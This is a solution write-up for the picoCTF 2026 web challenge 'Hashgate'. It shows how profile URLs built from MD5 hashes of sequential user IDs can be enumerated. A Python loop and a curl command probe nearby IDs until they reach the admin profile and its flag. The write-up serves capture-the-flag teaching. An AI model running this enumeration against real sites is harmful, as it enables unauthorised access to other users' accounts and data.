Hashgate | picoCTF 2026 Solutions

Description

You have gotten access to an organisation's portal. Submit your email and password, and it redirects you to your profile. But be careful: just because access to the admin isn't directly exposed doesn't mean it's secure. Can you find your way into the admin's profile and capture the flag?

Setup

Launch the challenge instance and open the web portal.

Solution

Step 1Observe the profile URL structure
After logging in, look at your profile URL. The portal uses the MD5 hash of your numeric user ID to construct the profile URL -- for example, user ID 3000 maps to MD5 hash e93028bdc1aacdfb3687181f2031765d.
# Verify: MD5 of 3000
python3 -c "import hashlib; print(hashlib.md5(b'3000').hexdigest())"
# Output: e93028bdc1aacdfb3687181f2031765d
# Your profile URL is something like: /profile/e93028bdc1aacdfb3687181f2031765d
Step 2Enumerate nearby user IDs to find the admin
The admin account is assigned a nearby ID. Generate MD5 hashes for IDs around 3000 and probe each profile URL until you find the one containing the flag. The admin is at ID 3019 (MD5: a74c3bae3e13616104c1b25f9da1f11f).
python3 << 'EOF' import hashlib import requests BASE = "http://<HOST>:<PORT_FROM_INSTANCE>" for uid in range(2980, 3050): h = hashlib.md5(str(uid).encode()).hexdigest() r = requests.get(f"{BASE}/profile/{h}") if "picoCTF" in r.text or "admin" in r.text.lower(): print(f"Found admin at ID {uid}: /profile/{h}") print(r.text) break print(f"ID {uid}: {h} -- not admin") EOF
Step 3Access the admin profile
The admin is at ID 3019. Navigate to their profile URL to read the flag.
python3 -c "import hashlib; print(hashlib.md5(b'3019').hexdigest())"
# Output: a74c3bae3e13616104c1b25f9da1f11f
curl http://<HOST>:<PORT_FROM_INSTANCE>/profile/a74c3bae3e13616104c1b25f9da1f11f

Flag

picoCTF{h4sh_g4t3_byp4ss3d_...}

Profile URLs are MD5 hashes of numeric user IDs. Guest is ID 3000 (MD5 e93028b...). Enumerate IDs near 3000 -- the admin is at ID 3019 (MD5 a74c3ba...) and their profile displays the flag.